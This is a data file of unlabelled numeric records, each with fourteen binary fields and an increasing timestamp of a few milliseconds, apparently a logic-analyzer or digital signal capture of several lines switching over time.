0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7501920e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7502200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7502240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7502680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7502920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7503400e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7503680e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7504200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7504440e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7504920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7505160e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7505240e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7505400e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7505680e-03 0,0,1,0,1,1,0,0,0,0,0,0,0,0,4.7505720e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7505760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7505920e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7506200e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7506680e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7506920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7507000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7507160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7507400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7507680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7507920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7508200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7508440e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7508680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7508920e-03 0,0,1,0,1,0,0,0,0,1,0,0,0,0,4.7508960e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7509000e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7509440e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7509680e-03 0,0,1,0,1,1,0,0,0,0,0,0,0,0,4.7509720e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7509760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7509920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7510200e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7510440e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7510680e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7510720e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7510920e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7511160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7511240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7511680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7511920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7512440e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7512680e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7513160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7513400e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7513480e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7513680e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7513920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7514000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7514200e-03 0,0,1,0,1,0,0,0,0,1,0,0,0,0,4.7514440e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7514480e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7514680e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7514920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7515000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7515440e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7515680e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7516200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7516440e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7516920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7517160e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7517680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7517920e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7517960e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7518200e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7518440e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7518520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7518680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7518920e-03 0,0,1,0,1,0,0,0,0,1,0,0,0,0,4.7518960e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7519000e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7519440e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7519680e-03 0,0,1,0,1,1,0,0,0,0,0,0,0,0,4.7519720e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7519760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7519920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7520200e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7520440e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7520680e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7520920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7521160e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7521400e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7521680e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7521720e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7522200e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7522440e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7522520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7522680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7522920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7523160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7523400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7523680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7523920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7524200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7524440e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7524680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7524920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7525160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7525400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7525680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7525920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7526200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7526440e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7526680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7526920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7527440e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7527680e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7528200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7528440e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7528480e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7528920e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7529160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7529240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7529680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7529920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7530440e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7530680e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7530920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7531160e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7531240e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7531400e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7531680e-03 0,0,1,0,1,1,0,0,0,0,0,0,0,0,4.7531720e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7531760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7532200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7532440e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7532920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7533160e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7533680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7533920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7534440e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7534680e-03 0,0,1,0,1,0,0,0,0,1,0,0,0,0,4.7534720e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7534760e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7534920e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7535160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7535240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7535400e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7535680e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7535920e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7536200e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7536440e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7536680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7536760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7537160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7537400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7537920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7538200e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7538680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7538920e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7539000e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7539160e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7539400e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7539480e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7539680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7539920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7540200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7540440e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7540680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7540920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7541160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7541400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7541680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7541920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7542200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7542440e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7542680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7542920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7543160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7543400e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7543480e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7543680e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7543920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7544000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7544440e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7544680e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7545160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7545400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7545960e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7546200e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7546680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7546920e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7547000e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7547160e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7547400e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7547480e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7547680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7547920e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7547960e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7548200e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7548440e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7548520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7548920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7549160e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7549680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7549920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7550440e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7550680e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7551160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7551400e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7551480e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,4.7551680e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7551920e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7552000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7552200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7552440e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7552680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7552920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7553160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7553400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7553680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7553920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7554200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7554440e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7554680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7554920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7555160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7555400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7555680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7555920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7556200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7556440e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7556680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7556920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7557160e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7557400e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7557680e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7557920e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7558200e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7558520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7558760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7559000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7559280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7559520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7559800e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7560040e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7560280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7560520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7560760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7561000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7561280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7561520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7561800e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7562040e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7562280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7562520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7562760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7563000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7563280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7563520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7563800e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7564040e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7564280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7564520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7564760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7565000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7565280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7565520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7565800e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7566040e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7566280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7566520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7566760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7567000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,4.7567280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,4.7567520e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,4.7567560e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,1,4.8805840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,4.8808040e-03 1,0,1,0,1,1,0,0,0,1,0,1,0,1,4.8808240e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,4.8808440e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,1,4.8811320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,4.8811560e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,1,4.8811800e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,4.8812080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,1,4.8812320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,4.8812600e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,1,4.8812840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,4.8813080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,1,4.8813320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,4.8813560e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,1,4.8813800e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,1,4.8814080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8814120e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8814360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8814600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8814840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8815080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8815160e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8815320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8815560e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8815800e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8816080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8816320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8816600e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8816840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8817080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8817320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8817560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8817640e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8817800e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8818040e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8818280e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8818560e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8818600e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8818800e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8819080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8819320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8819560e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8819800e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8820040e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8820280e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8820560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8820600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8820800e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8821080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8821320e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8821560e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8821600e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8821800e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8822040e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8822120e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8822280e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8822560e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8822800e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8823080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8823320e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8823560e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8823800e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8824040e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8824120e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8824280e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8824560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8824600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8824800e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8825080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8825320e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8825560e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8825800e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8826080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8826120e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8826360e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8826600e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8826840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8827080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8827320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8827560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8827640e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8827840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8828080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8828320e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8828600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8828840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8829080e-03 1,0,1,0,1,0,0,0,0,1,0,0,0,0,4.8829120e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8829160e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8829320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8829560e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8829800e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8830080e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8830320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8830600e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8830840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8831080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8831160e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8831320e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8831560e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8831800e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8832080e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8832120e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8832320e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8832600e-03 1,0,1,0,1,1,0,0,0,0,0,0,0,0,4.8832640e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8832680e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8832840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8833080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8833320e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8833560e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8833800e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8834080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8834320e-03 1,0,1,0,1,0,0,0,0,1,0,0,0,0,4.8834600e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8834640e-03 1,0,1,0,1,1,0,0,0,1,0,0,1,0,4.8834840e-03 1,0,1,0,1,1,0,0,0,1,0,0,0,0,4.8835080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8835160e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8835320e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8835560e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8836080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8836360e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8836840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8837080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8837560e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8837840e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8838360e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8838600e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8839080e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8839320e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8839840e-03 1,0,1,0,1,0,0,0,0,0,0,0,0,0,4.8840080e-03 1,0,1,0,1,0,0,0,0,0,0,0,1,0,4.8840360e-03 